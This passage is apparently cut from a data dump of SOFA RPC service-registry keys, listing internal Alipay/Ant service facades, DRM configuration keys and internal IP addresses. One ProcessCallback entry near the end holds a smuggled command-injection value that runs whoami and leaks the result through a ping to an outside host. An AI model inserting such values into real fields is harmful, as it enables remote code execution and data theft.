NSMIT_DASBI#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.ChangeEventServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.aciamcore:name=cn.com.antcloud.common.auth.client.config.AntPersonalDrmConfigTrigger.grayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankForceRedeemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenCommentGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:changeTaskAgreeCallBackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.ChannelApiConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.PermissionFacade:1.0:miniSearchPermissionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.config.zcache.ZcacheZoneIdcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BKRDFAST#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accountcore.common.service.facade.AccountQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.178.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscvprod.common.service.facade.InsFinanceVisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantFacePaySignExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacportal.common.service.integration.imerchprod.MerchantCaseLogFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:insautobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.CertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secuinfos.common.service.facade.api.SecumngNewsInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.create.MiniAppCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.MetricFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","id.dana.bizcenter.common.service.facade.api.BizOrderUserValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ugrowthcampaign.common.service.facade.service.UgcAssetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.processor.InvokeProcessorComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mymdp.common.service.facade.universaldeploy.service.DeployService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.topic.TopicConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.deposit.query.QueryDepositService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instopen.service.facade.message.InstMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.ldc.drm.CZoneCacheConfigDRMImpl.syncToCZone,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccdc.common.service.facade.NoSensiCardInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuInefficiateRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publictest.facade.feedBack.PublicTestServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingMsgCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskTipsQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.tool.SerialNoOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingCommandManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlExtEscapeRuleString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ACMANTZHIXIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:swiftweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.EventFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.AuthorizationCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_CUSTOMS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditamount.prod.facade.AmountTransferQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.OrgCertifyTempStorageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.permitMaxValueCntStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settleprod.service.facade.agency.AgencyFacade:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.exchange.VcpAssetExchangeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.SlsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.supergw.service.facade.transaction.LogonForwardService:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiscore.common.service.facade.MrchisUniFrameViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.ClientCustomerSlimSwitch.ctuUidBlackListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.65.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.dweg:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-PCLOANPROD-SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:afscOssClient@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:windowsappsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-creditAuditOneStepCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:mrmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.consumerRunModeEvent0,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smartsql.service.facade.service.SqlGatewayServer#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finannafccore.common.service.facade.script.api.FundBackUpScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.EventSchemeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.picasso.common.service.facade.template.TemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rating.service.facade.charge.ChargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketQueryReceivedBenefitsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.api.PortfolioProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.rzone.FluxInvokeRService:1.0:insttrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkLiveAdvertMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FCSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.intervalMsWhenFalling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","policybench@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.cryptprod.common.service.facade.CipherCertQueryFacade:1.0:fccryptprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.category.MiniCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_GIFT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsbrain.common.service.facade.service.GraphDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.api.PlanInviteQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.SnapReplayParamsDrmResoureInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CTURuleExcludeWriteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.workflow.InvestFlowManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentfactory.common.service.facade.appx.AppxServApplyDrcMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.xcpt.XcptFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_WITHDRAW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quotstore.meta.service.DataManagementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SolutionTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowLabelInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.ds.SBCQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapAccessKeyService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.BindCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.auth.api.AuthApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.WTOperateTraceQueryFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.176.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linkede.fabricsrv.rest.ProjectRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementQueryStdFacade:1.0:mainSite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.partner.PartnerOperationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.AllocateInstructionExeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.149.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.FundForceRedeemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.195.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nodejs.ConsumerService:1.0:open-api@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.accenter.service.facade.api.AccenterTaxSchemaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpmscore.facade.PlanTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frastress.common.service.facade.api.bizindicator.BizIndicatorRunFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ucdpmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProductCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbadvert@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:socProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.CarinaProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fastq-web@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogActionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.solution.MerchantCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:benefitConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.job.RequestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openaccess.common.quickaccess.facade.service.proxy.CallbackInfoByQuickaccService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.15.224.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.FeatureGroupMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.apipay.instportal.common.service.facade.alisis.AlisisTenantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mrchservbase@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.160.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.heralib.service.facade.api.ComputeStoreServiceFacade:1.0:adatabus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.core.service.common.interfaces.NoSQLStoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.DetectTaskOrderManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feecharge.common.service.facade.api.ChargeXtsRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.CommonCmdDrm.grayCmdTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchservbase.biz.service.dynamiccode.UnifyCodeToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.repayrefund.RepayRefundSupportDrm.refundAdmitOperationPdCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.drm.CommunityDRMManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliQueryLogFacade:1.0:giftprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.contentsync.ContentSyncTriggerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iecpprod.common.service.facade.api.PaymentRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FININFO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.25.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.59.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloantrade.service.invest.api.InvestIntFeeDailyEntryAcctService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmobile.common.service.config.facade.ConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.213.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iaccenter.facade.query.api.ReconIdQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.common.service.facade.AbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pvsofaproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:wealthbffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditdmp.facade.PcdmpFundManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrecon.api.InsReconWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FapResearchReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.core.flow.test.PromobenchEngineServiceTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcreditdmp_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.flowctrl6017#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.163.209#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditint.facade.service.RepayBudgetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassistantservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Zone_Servers__msgbrokerrep#@#DEFAULT_INSTANCE_ID#@#msgbroker","com.alipay.zscale.api.ElasticModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.BizNodeDependencyDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ChargeoffInstMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-datatransfermanage-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kgopen.common.sdk.open.service.schema.OntologyEntityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.gather.common.facade.core.service.GatherTableOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyopt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.232.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.ordermng.pmcShineDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.manage.facade.DiagnosisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.168.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.friendtab.FriendTabConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.nonconfirmredeem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.CreateKeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ucdp.venue.UcdpRecallFacade:1.0:bstsolprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insserviceprod.facade.InsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsInvoiceTitleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.ActivityRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.ins.MedicalMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custprod.service.spi.CustBizOperatorConselClient:1.0:bkfundbuss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.blackbox.BbIntelligenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:quezaoweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finassistantcore.mng.facade.entity.api.EntityFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferAttrGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:tgrowthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_FINDATAPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:wxSignSendMessageNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsContinuousFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.api.FileCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.f2fpay.F2fPayEncodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.BrandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_COUNTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`86842598-80102053-uniqueId-104003034.rce.noble.log.lynnshare.cc;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.util.localcache.BudgetCachePool:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.api.voucher.FinVoucherPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.slaguard:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.opscore.common.event.EventReceiver:1.0:SitebuilderEventReceiver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finnetinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxClientQuoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOF